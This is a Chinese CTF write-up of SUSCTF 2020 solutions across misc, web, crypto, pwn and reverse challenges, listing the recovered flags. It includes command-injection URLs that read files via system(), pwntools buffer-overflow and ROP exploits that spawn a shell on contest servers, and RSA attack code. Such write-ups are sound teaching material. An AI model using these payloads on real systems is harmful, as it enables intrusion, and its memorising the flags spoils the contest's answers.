SUS2020

发表于 | 更新于: | 分类于 | 本文总阅读量
字数统计: 3k | 阅读时长 ≈ 14

分数 3287

排名 15

题解

[Misc]签到

SUSCTF{Welcome_t0_SUSCTF}

[Misc]爆破鬼才请求出战

解题思路
  1. 打开会有提示m?s?_?tt4?k!
  2. 利用ARCHPR掩码攻击获取密码

    m4sk_att4Ck!

  3. 解压得到LSB.png,利用StegSolve提取隐写数据,保存成文本,得到
    S{urgdt1}UY_30__sS0a_04mc

  4. 栅栏密码,每组3字
    SUS{Y0u_ar3_g00d_4t_m1sc}

[Misc]签到之公众号

关注公众号,回复flag
SUSCTF{W3lc0m3_t0_SUSCTF}

[Misc]Dance_Dance

解题思路

  1. 图片

  2. 利用https://www.dcode.fr/dancing-men-cipher解密得到 

    1
    2
    pa sswdL etU  
    sdanCe

  3. 根据提示“让我们跟着音乐起舞吧!”,使用binwalk查看是否内含文件,发现zip,故dd if=The_dancing_men.png of=f.zip skip=48243 bs=1将压缩包分离出来

  4. 解压发现需要密码,正是LetUsdanCe
  5. 得到音频文件Do_u_know_spectrum.wav,用Audacity打开,并查看频谱图有:
  6. 扫描二维码得
    SUS{1nt3r35t1nG_5p3ctRum}

[Misc]ƃɐlɟ¯ʇuᴉɹԀ

解题思路
  1. 用010Editor查看发现尾部有类似zip文件头的标志,但整个字节流是倒序的,故利用Python顺过来 
1
2
3
4
5
6
7
8
9
10
11
12
import binascii

f = open("D:\\Download\\ti_nepo_ot_woh", "rb").read()

with open("D:\\Download\\sus.zip", "wb") as m:
    m.write(binascii.b2a_hex(f))

tmp = open("D:\\Download\\sus.zip", 'r').read()
print(tmp[::-1])

with open("D:\\Download\\result.zip", "wb") as result:
    result.write(binascii.a2b_hex(tmp[::-1]))

  1. 得到一个可以正常解压缩的zip文件result.zip,解压缩得到here_are_some_codes.zip和use_zipin_to_get_password.txt,后者中有以下文本 

    1
    tyud0ko3aMDa1MttNDoaaunr0NtMtw:moy3aryoimi:uu:0m01aiypiuDaMmukaNrNM?M:M:mnnnt1rmDp?001Nanow:u?kN:0ykkyaMDkyMuDNMpuaNDykNm:NmmMMk1pki0idodmanMimupwwDooiy:i:kodmMOOa?k1witMk:aukiiM:iakDmni3w3?mwioiDooM:wiMrm:m0ooO:OokNMykNNwimOak0ddmopOmymuNo1aM0Mdt1?1Domynmnmw:0:o:uD30mDDyi:Dppi3a0Nmi:yOr??OOkdwwip3wr0u3aw1Mw:irrmtpkMd0n0kyD:3y:odnMDuiDNyaNMpyNykm:puw0?:DNrMoMkMDk3Nk03wtiO0mpoyidymtdiiD3O3Oa1yin?o3wDm3:mamduayD0:?iur?uwn:N001uioDa3Dumd3kukmdadmOaodn:iioy:nimnauu31nk0tda?rpoi1i1ioMOmi0MyyMktmNM::mOi3oMyMwMopoMtMu?ka:nmM3D:NyydpuymN1pO0mwoymraDiymMOd:pODuMmy0nDOMO0id3:ydDdrkNi0yoD1imOoDm0kinwyMi?MONm0Nyood:ONDdi:oyw0OM1:?:w?pitkOoa0:dtraiurNyyrN3uw1uwMyDtp10Ma:MMo:moMirupDmioOadOitwDt:yy0D:i3Na:naoMatra1uMrNwndiku3m?mOuda:OM1wnyourkau1dDw:oM:1myoNNDkk:ka3p?rywDwiakDa3d:i0Mo3a3M3aMkry0ionkmO3:?waO:MM0MNNymar3pmudwompwuoo0mOOyDNak1aDiow13yr?mNikw?royu?p1Dkm1k:DDmktty1rrMp?yw3y3kmtpyd:maiwDN0nDOMMkDdy:watMkidu:D:Mi0w00aN:ku:1:a:npaNOD:MpwODaiaDu:dMoaDmayOmwwMtw:0DuM3u?:po0iN:adrt0up?ONiND?nNmtDdronmaOMinm0:miMDyddMpk?doMdi0pNOyoMMuiwt0m3at0uDuid0Nm0iiyi:uOONdiOr3tMpn:kri3kpomioMDmN1Oadaai3Mmwa10OrwriiON:0:uuiDkD?r:iynuMui0yiarMy:O:yMp?mdkDDo33ay:pMnanNDo3nkoiOapt:1MNkr0Di?0mkr0yy:NauatDao0aim0w3i:Op0aikwDmmuoimnyr:Nuo:p3no0yy3apauDua0w0mo0u?3Nup?mo:3NMDwNDtudyi3D:d1DmNaykn1MOMwo?OMpodna1D0:wm0kiDrr?o?ppuwu:tNykDpkpNttnunurd11ptwamrnm3k0a:i1pOpu0mMtua331Ou3OMaONkMaDrMptDO30yDrd1duooOuNODkNkNmi1N0MMiOadmymNnOkwM0MMDkMMMraa1dtwuoDd0a:wkm300O0ymD1w13:oDNayw0i0a0My130Oim0?0urro3OOMp3ukDaiiymnr

  2. 字频统计发现,,按频率从高到底有: Mima:D0youkNOw3dpr1nt?

  3. 解压成功,获得sus文件,内有G代码,拿到http://nraynaud.github.io/webgcode 执行,Front面有flag,多找两个面放大即可看到被挡住的字符了

    SUS{3D_Pr1nting_1s_Great}

[Misc]抓住那只小老鼠

解题思路

  1. 用010Editor查看文件,发现尾部有提示:
    D0 y0u Kn0wPseudo encryption?

  2. 故为zip伪加密,找到504b0102后加密标志位(除了里面包含的一个zip文件外)改为0000,可正常解压,得到keyboard.pcapng和这个小老鼠竟然是个右撇子.zip

  3. 得到的zip仍为加密的,猜测密码应在keyboard.pcapng中
  4. 参考1
    参考2
    从键盘流量中获取信息并导出到usbdata.txt:tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }
nums = []
keys = open('usbdata.txt')
for line in keys:
    if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
         continue
    nums.append(int(line[6:8],16))
keys.close()
output = ""
for n in nums:
    if n == 0 :
        continue
    if n in mappings:
        output += mappings[n]
    else:
        output += '[unknown]'
print 'output :\n' + output

PASSWORD L3T-U5-L00K-4T-TH3-R1GHT-BUTT0N
实际上应该为小写。。。。l3t-u5-l00k-4t-th3-r1ght-butt0n

  1. 通过以上密码可直接解压第二个zip,分析mouse.pcapng数据,tshark -r mouse.pcapng -T fields -e usb.capdata > mousedata.txt 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nums = []
keys = open('mousedata.txt','r')
posx = 0
posy = 0
for line in keys:
    if len(line) != 12 :
        continue
    x = int(line[3:5],16)
    y = int(line[6:8],16)
    if x > 127 :
        x -= 256
    if y > 127 :
        y -= 256
    posx += x
    posy += y
    btn_flag = int(line[0:2],16)  # 1 for left , 2 for right , 0 for nothing 
    # right button
    if btn_flag == 2 :
        print posx , posy
keys.close()

python mouseexp.py > xy.txt得到坐标文本

  1. gnuplot进入,然后plot "xy.txt"得到
  2. 之前没注意到是右键,采到的左键数据镜像过来是fakeflag,淦。。
  3. 搞错了,刚刚是左键数据,用右键重画一次,垂直镜像一下就能看到

    SUS{Hiahia_G0t_1t!}

[Misc]fix_fo

解题思路
  1. 将文件头60改成50即可正常解压
  2. 得到文本
    新佛曰:諸隸殿僧降殿吽殿諸陀摩隸僧缽薩殿願心殿薩殿咤伏殿聞莊摩咤殿諦殿如叻須降闍殿亦修我殿愍殿諸隸殿波如空殿如如囑囑殿
  3. 新佛曰解密
    SUS{Ta1k_w1th_F0}

[Misc]你还好吗?

解题思路
  1. 解压后发现密码被加密了,用ook解密得到
    Ar3_y0u_OK??
  2. 用其解压Sus.7z得到png,根据提示知其高度不够导致crc校验过不了,用010editor打开,猜测差不多高就直接将高度改为0196就成功了(不行就CRC爆破)
  3. 打开得到flag

    SUS{wuhu_y0u_f1nD_m3}

[Web]Sign_in

解题思路
  1. 直接转到题目地址,有
  2. F12 - Network - CTRL R
  3. 点击susctf.com,Headers即可查看flag

    SUSCTF{752a426b72b98bf7eda6d5cc53174a5e}

[Web]Script_Kiddle

解题思路
  1. 右键查看源码发现按钮会生成1000以内随机数,且console会回显文本
  2. F12 - console
  3. 一直“揍他!”就可以拿flag

    SUSCTF{4cded8ce3b7cdf6e8b44a030dfa15b27}

[Web]刀来!

解题思路
  1. 转到题目地址
  2. 可以直接执行命令所以http://susctf.com:10005/?z33=system(%22ls%22);
  3. 全是文件,也cat不到flag,所以不停往上一级目录查看,直到http://susctf.com:10005/?z33=system(%22ls%20../../../%22);
  4. http://susctf.com:10005/?z33=system(%22cat%20../../../flag%22);

    SUSCTF{f5f397a37b728d927576ae889b908d17}

[Web]AT_Field

解题思路
  1. 转到题目地址,输入框只允许2个字符,故F12修改长度为4
  2. 输入flag,点击按钮发现不给flag,直接回车拿到了
    SUSCTF{b8442b229c248ab68061f4602e7e0649}

[Web]first_lesson

解题思路

  1. http://susctf.com:10008/?z33=feiwu&rmb=shenxian后回显 

    1
    2
    3
    z33 is feiwu
    rmb is shenxian
    use POST method to submit aa

  2. 打开Fiddler,点击左下角开始capturing,刷新http://susctf.com:10008/?z33=feiwu&rmb=shenxian,双击新出现的结果

  3. 复制get请求内容

  4. POST数据,注意添加content-type,且&用url编码
  5. execute并查看结果
  6. 解码
  7. 在textview中查看

[Crypto]嘤语

解题思路
  1. 注意到后面两个月亮表情对应左右花括号,猜测最后一句话是flag的密文,同时花括号前面有六个字符,应该就是SUSCTF,看1和3字符重复,验证了猜想基本正确
  2. 因为开着PyCharm就正好直接拿进来CTRL R做替换了,替换思路是:先将SUSCTF对应的表情替换掉,发现前面还有个F***:显然是对应”FLAG”,然后有”表情+F”的组合是”OF”,再对其他字符做填充,如CLASSICAL,CIPHER等,就可以逐渐恢复出flag了 
1
c = "I😊⬜CRYPTOGRAPHY,⬜A⬜CLASSICAL⬜CIPHER⬜IS⬜A⬜TYPE⬜OF⬜CIPHER⬜THAT⬜😴AS⬜USE🙃⬜HISTORICALLY⬜😅UT⬜😊O😴⬜HAS⬜FALLE😊,⬜FOR⬜THE⬜😭OST⬜PART,⬜I😊TO⬜🙃ISUSE.⬜I😊⬜CO😊TRAST⬜TO⬜😭O🙃ER😊⬜CRYPTOGRAPHIC⬜ALGORITH😭S,⬜😭OST⬜CLASSICAL⬜CIPHERS⬜CA😊⬜😅E⬜PRACTICALLY⬜CO😭PUTE🙃⬜A😊🙃⬜SOL😮E🙃⬜😅Y⬜HA😊🙃.⬜HO😴E😮ER,⬜THEY⬜ARE⬜ALSO⬜USUALLY⬜😮ERY⬜SI😭PLE⬜TO⬜😅REA😷⬜😴ITH⬜😭O🙃ER😊⬜TECH😊OLOGY.⬜THE⬜TER😭⬜I😊CLU🙃ES⬜THE⬜SI😭PLE⬜SYSTE😭S⬜USE🙃⬜SI😊CE⬜GREE😷⬜A😊🙃⬜RO😭A😊⬜TI😭ES,⬜THE⬜ELA😅ORATE⬜RE😊AISSA😊CE⬜CIPHERS,⬜😴ORL🙃⬜😴AR⬜II⬜CRYPTOGRAPHY⬜SUCH⬜AS⬜THE⬜E😊IG😭A⬜😭ACHI😊E⬜A😊🙃⬜😅EYO😊🙃.⬜HERE⬜IS⬜YOUR⬜FLAG:⬜SUSCTF{EASY_REPLACE_CRYPTO}."

SUSCTF{EASY_REPLACE_CRYPTO}

[Crypto]RSSA

解题思路
  1. 大数分解,拿去factor和yafu都解不出来,所以Pollard p-1
  2. 因为hint值太大了,这就意味着d2会很小,那么就是wiener攻击 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from Crypto.Util.number import *
from gmpy2 import *
from generalProject.rsa_wiener_attack.RSAwienerHacker import *

e1 = 65537
n1 = 3060339854667248593045439268471563618105947041290938481437325848798323938532596377624638621097456963253037677560878331946238549090696901239603144752351327600586368201100237434726169753646811787604853964860726798254336863499145531199565109074254779876690101270258127715336168391612300304331101360275482233310674932139807609972793497538656646848415992324215456226007567101761161788925814705494294400067939912005412022042668218198383402940130898294895649777977189323224263157282092376424922614684186453440072575716268919964175691720756763119457242056477670177079759247122219232189306055203008434843682933286646266213545529
c1 = 3034469135294668773920507296346350907742457191809402478651651217514955247855057533285593352174358500799066186911877764529883001921082777805708529058571202933977282137208978346424554431043278549161483292409933547041813315975823969433401643242339079668276684778997460119485703198793575336626432882752487489338573038850368920863161207166964460908530752241974904789636070196624073568755921923220050851726340905458096183125781252224795386550130576788381853678417208871830497382705959067939298640356768911183934418681683145007224744048971106742284638285450915496700589787964160222024466744139469925581347695004377624495126915
n2 = 10807879892068351137882646909051489249635133849135554246405938629884200521475944531591568601618793402948721935425608627699981096326141738901035519331102707539920513581542001947790197240207566927971678513209908723244407016045630599048822569018427598397968961619045802981482548829222463503036924385721648266628299260991104729336073926580607199543174083380805549563817814412425939068641770601855910658492094090168370370854773061021846017875357170911444961167591295893582538961911101048500175084293595051999904087614747835111979609341806717723922618200228638905661136101116560894773115822777483505620089698306929561785323
c2 = 9683205078328252218032269702345643329971829786690479639266538047554486626818807182948959694083494415321749771694962705383395520313360833790060850924741844334210061457412714409510396570202504721712360741707661477563359914632426508418800225158732852097973890339230747236123801365622331935944566042700904386015421937836728697959613396426201564885786343062950855931133983926321168463148165960442802306229736368651402634294933332130289754301101314108768581240883792427050189942403534268596623333863094794374201347799653298070303061655891582667320043298218647231196611752237350024535657749266580570143793917557001539320495


def Pollard_p_1(N):
    a = 2
    while True:
        f = a
        # precompute
        for n in range(1, 80000):
            f = pow(f, n, N)
        for n in range(80000, 104729 + 1):
            f = pow(f, n, N)
            if n % 15 == 0:
                d = GCD(f - 1, N)
                if 1 < d < N:
                    return d
        print(a)
        a += 1


# print(Pollard_p_1(n1))
p1 = 23975730849019524224501133179102224796674075610246254128092570426422042826827752011251742168145817735504529147185472555701614948560936966981378192239399032009466320988235920811175788786979445565393611983841562134713850961292348331543316941450790337102298329241467860332089091772440405878425341499542277671695443
q1 = n1 // p1
d1 = invert(e1, (p1-1)*(q1-1))
# print(d1)
# d1 = 1290874390686504113800572548905624374916776782724975256433059733649402123331783485100866839214765709327051490890533906164789637167756002530899939477455484690947244496257304479081591111430374674711210201941039895188105776196200300051585789328908847443600121450707473374776889986080083458396462547926445074654616956992228117873470173124680591450377597400447728593106359737986839543880607109412876695735287787219432558567338918079968635213970201053049858159596886411010563653463432345037560562367605341086450175287814510703091118683130796239718226908370016179998972192219601416531060637529519864036298222311171029394100081

hint = pow(c1, d1, n1)
# print(hint)
# hint = 6447619334753222352642437426429858393559157103132369271461053517398729066459898239876515174356275892746233257614418880902563829997140350674866683206108482180467602522894155668424194920123827480635464864103765289832500322877007095569898442461637065138702513583894277315133366039750740029708723131396176433739505095125300759881683959288494017209369857877787318788348783910350463678400192419123716822673269223216260659356722683659879902069300190507155060239407696896030102443235801007815882499003540957722284061124180164977533909072687907196264536660791464489256384351443110635373913931349991593387041785791002589247321

d2 = hack_RSA(hint, n2)
# print(d2)
d2 = 233
flag = long_to_bytes(pow(c2, d2, n2))
print(flag)

SUSCTF{Sm0oTh_PQ_&_Sma11_d}

[Pwn]babync

解题思路
  1. Ubuntn中nc 146.56.223.95 20002
  2. ls然后cat flag即可

[Pwn]babystack

解题思路

  1. checksec babystack 

    1
    2
    3
    4
    5
    Arch:     amd64-64-little  
        RELRO:    Full RELRO  
        Stack:    Canary found  
        NX:       NX enabled  
        PIE:      PIE enabled

  2. IDA64打开,main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 buf; // [rsp+0h] [rbp-60h]
  __int64 v5; // [rsp+8h] [rbp-58h]
  __int64 v6; // [rsp+10h] [rbp-50h]
  __int64 v7; // [rsp+18h] [rbp-48h]
  __int64 v8; // [rsp+20h] [rbp-40h]
  char s1[8]; // [rsp+30h] [rbp-30h]
  __int64 v10; // [rsp+38h] [rbp-28h]
  __int64 v11; // [rsp+40h] [rbp-20h]
  __int64 v12; // [rsp+48h] [rbp-18h]
  __int64 v13; // [rsp+50h] [rbp-10h]
  unsigned __int64 v14; // [rsp+58h] [rbp-8h]

  v14 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(_bss_start, 0LL);
  buf = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  *(_QWORD *)s1 = 0LL;
  v10 = 0LL;
  v11 = 0LL;
  v12 = 0LL;
  v13 = 0LL;
  puts("Hello,I'm 1p0ch.");
  puts("Leave something: ");
  read(0, &buf, 0x50uLL);
  if ( !strcmp(s1, "btis_wants_girlfriends") )
    backdoor(s1, "btis_wants_girlfriends");
  return 0;
}
  1. 所以,只要s1="btis_wants_girlfriends"即可,查看栈信息

    只要填充'a'*0x30即可覆盖到s1,因此有exp如下 
1
2
3
4
5
6
7
from pwn import *

p = remote('146.56.223.95', 20006)

payload = 'a'*48 + "btis_wants_girlfriends"
p.send(payload)
p.interactive()

[Pwn]babyrop

解题思路

  1. checksec babyrop 

    1
    2
    3
    4
    5
    Arch:     amd64-64-little  
        RELRO:    Partial RELRO  
        Stack:    No canary found  
        NX:       NX enabled  
        PIE:      No PIE (0x400000)

  2. IDA64打开,直接F5,main() 

1
2
3
4
5
6
7
8
9
10
11
12
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-60h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  memset(&buf, 0, 0x60uLL);
  puts("Such easy rop");
  puts("Leave something: ");
  read(0, &buf, 0x100uLL);
  return 0;
}

  1. read存在栈溢出漏洞,填入0x68个’a’就可达返回地址,但是broken_backdoor只能ls,并不是我们想要的,所以需要构造ROP
    类似题目

  2. 可通过IDA直接SHIFT+F12找到/bin/sh地址为0x601050

  3. 函数窗口查看_system()地址0x400540
  4. 因为传入一个参数,所以需要知道rdi地址,利用ROPgadget --binary babyrop --only 'pop|ret' | grep rdi可得0x400763,所以先覆盖’a’再填入rdi再放binsh再加system即可执行 
1
2
3
4
5
6
7
8
from pwn import *

p = remote('146.56.223.95', 20007)
rdi = 0x400763
binsh = 0x601050
sys_addr = 0x400540
p.sendline('a'*(0x60+8)+p64(rdi)+p64(binsh)+p64(sys_addr))
p.interactive()

SUSCTF{29b76a5fedeb34b78d4284e896ced52f}

[Pwn]babydoor

解题思路

  1. checksec babydoor 

    1
    2
    3
    4
    5
    Arch:     amd64-64-little  
        RELRO:    Partial RELRO  
        Stack:    No canary found  
        NX:       NX enabled  
        PIE:      No PIE (0x400000)

  2. IDA64打开,F5,找到main() 

1
2
3
4
5
6
7
8
9
10
11
12
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-60h]

  setbuf(stdin, 0LL);
  setbuf(_bss_start, 0LL);
  memset(&buf, 0, 0x60uLL);
  puts("Such easy ret2text");
  puts("Leave something: ");
  read(0, &buf, 0x70uLL);
  return 0;
}
  1. read存在栈溢出漏洞,传入'a'*0x68即可到达返回地址,exp如下 
1
2
3
4
5
from pwn import *

p = remote('146.56.223.95', 20008)
p.sendline('a'*0x68 + p64(0x400676) + p64(0x4006fb))
p.interactive()

[Pwn]snake

解题思路
  1. ssh连上,./snake,然后就硬玩

[Reverse]迷宫

解题思路
  1. 在IDA中反编译后找到
  2. 猜测是个迷宫矩阵,故按8x8排列得到
  3. 所以出迷宫的方法是:LLLDDRDRRDDLLLD
  4. ./babymaze然后输入以上字符串得结果
    SUSCTF{DLLLDDRRDRDDLLLLLLDDRDRRDDLLLD}

[Reverse]表面

解题思路
  1. 用IDA打开,在main()中注意到有一个wrongans很可疑,查看一下,在其相邻的地方有
  2. 这就很有意思了,太像一个Banner了,其中还有0x0AH的格式,猜想是需要重新调整格式得到想要的flag,用文本编辑器调一下即可,得到
  3. 调整一下宽高明显点

    所见即所得
    SUS{all_the_alphabets}

[Reverse]静置

解题思路
  1. 拖到IDA反编译,SHIFT+F12查看字符串
  2. 查看mov
  3. 16进制转ASCII即可 
1
2
3
4
5
6
lst = [0x53, 0x55, 0x53, 0x43, 0x54, 0x46, 0x7B, 0x57, 0x33, 0x6C, 0x63, 0x6F, 0x6D, 0x65, 0x5F, 0x74, 0x6F, 0x5F,
       0x53, 0x55, 0x53, 0x43, 0x54, 0x46, 0x5F, 0x32, 0x30, 0x32, 0x30, 0x5F, 0x52, 0x45, 0x23, 0x7D]
flag = ""
for i in lst:
    flag += chr(i)
print(flag)

SUSCTF{W3lcome_to_SUSCTF_2020_RE#}



----------- 本文结束 -----------




0%